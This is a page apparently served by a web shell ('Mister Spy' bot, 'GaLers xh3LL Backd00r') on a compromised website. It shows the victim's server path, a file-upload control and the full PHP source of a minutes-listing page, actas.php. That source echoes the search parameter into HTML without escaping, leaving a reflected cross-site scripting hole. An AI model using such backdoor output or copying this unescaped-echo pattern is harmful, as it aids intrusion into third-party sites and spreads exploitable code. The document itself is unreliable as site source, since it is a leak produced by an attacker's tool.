Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/
Upload File :
Current File : /home/caballoscriollos/public_html/web/actas.php

<?php
require_once('inc_library.php');

$IdCategoria    = 12;//intval($_REQUEST['IdCategoria']);
$Page           = intval($_REQUEST['Page']);
$query			= strval($_REQUEST['query']);
$PageSize       = 50;

$oNoticias      = new Noticias();
$oCategorias    = new Categorias();

$oCategoria = $oCategorias->GetById($IdCategoria);
$oPage      = new Page($Page, $PageSize);


$filter = array('IdCategoria' => $IdCategoria, 'Libre' => $query);

$Paginado   = Pageable::PrintPaginatorFront($oPage, $oNoticias->GetCountRows($filter), true);
$arrData    = $oNoticias->GetAll($filter, $oPage, false, false);
$arrCategorias = $oCategorias->GetByIdTipo(2);

?>
<!DOCTYPE html>
<html lang="en">
	<?php include("ssi_head.php"); ?>
	<body class="custom-cursor">
		<div class="preloader">
			<div class="preloader__image"></div>
		</div>
		<div class="page-wrapper">
			<?php include("ssi_header.php"); ?>
			<!--Page Header Start-->
			<section class="page-header">
				<div class="page-header__bg" style="background-image: url(assets/images/backgrounds/bg_objetivo.jpg);"></div>
				<div class="container">
					<div class="page-header__inner">
						<h2>Actas</h2>
						<ul class="thm-breadcrumb list-unstyled">
							<li><a href="index.php">Home</a></li>
							<li><span class="icon-down-arrow"></span></li>
							<li>Institucional</li>
						</ul>
					</div>
				</div>
			</section>
			<!--Page Header End-->			
			<section class="about-one">
				<div class="container">
					<div class="row">
						<div class="col-xs-12">
							<div class="sidebar__search">
							<form action="actas" method="get" class="sidebar__search-form">
		                            <input type="search" name="query" placeholder="Buscar Actas" value="<?= $query ?>">
		                            <button type="submit"><i class="icon-magnifying-glass"></i></button>
		                        </form>
	                    	</div>
	                    </div>
					</div>
					<div class="row">
						<div class="col-xl-12">
							<div class="about-one__right">
								<ul class="about-one__points">
									<?php
									$count = 0;
									foreach ($arrData as $oNoticia) {
										if ($count % 2 == 0 || true) {
									?>
									<li>
										<div class="text">
											<p><i class="fa fa-book mr-10"></i><a href="noticias_detalle.php?IdNoticia=<?= $oNoticia->IdNoticia ?>"><?= $oNoticia->Titulo ?></a></p>
										</div>
									</li>
									<?php
										}
										$count++;
									}
									?>

																																																																																																				
								</ul>
							</div>
						</div>
						<div class="col-xl-6">
							<div class="about-one__right">
								<ul class="about-one__points">
									<?php
									$count = 0;
									foreach ($arrData as $oNoticia) {
										if ($count % 2 == 1 && false) {
									?>
									<li>
										<div class="text">
											<p><i class="fa fa-book mr-10"></i><a href="noticias_detalle.php?IdNoticia=<?= $oNoticia->IdNoticia ?>"><?= $oNoticia->Titulo ?></a></p>
										</div>
									</li>
									<?php
										}
										$count++;
									}
									?>
								</ul>
							</div>
						</div>						
					</div>
				</div>
			</section>
			<?php include("ssi_logos.php"); ?>  
			<?php include("ssi_footer.php"); ?>  

		</div><!-- /.page-wrapper -->
		<?php include("ssi_mobile.php"); ?>  
		<?php include("ssi_search.php"); ?>  
		<?php include("ssi_scripts.php"); ?>     
	</body>
</html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat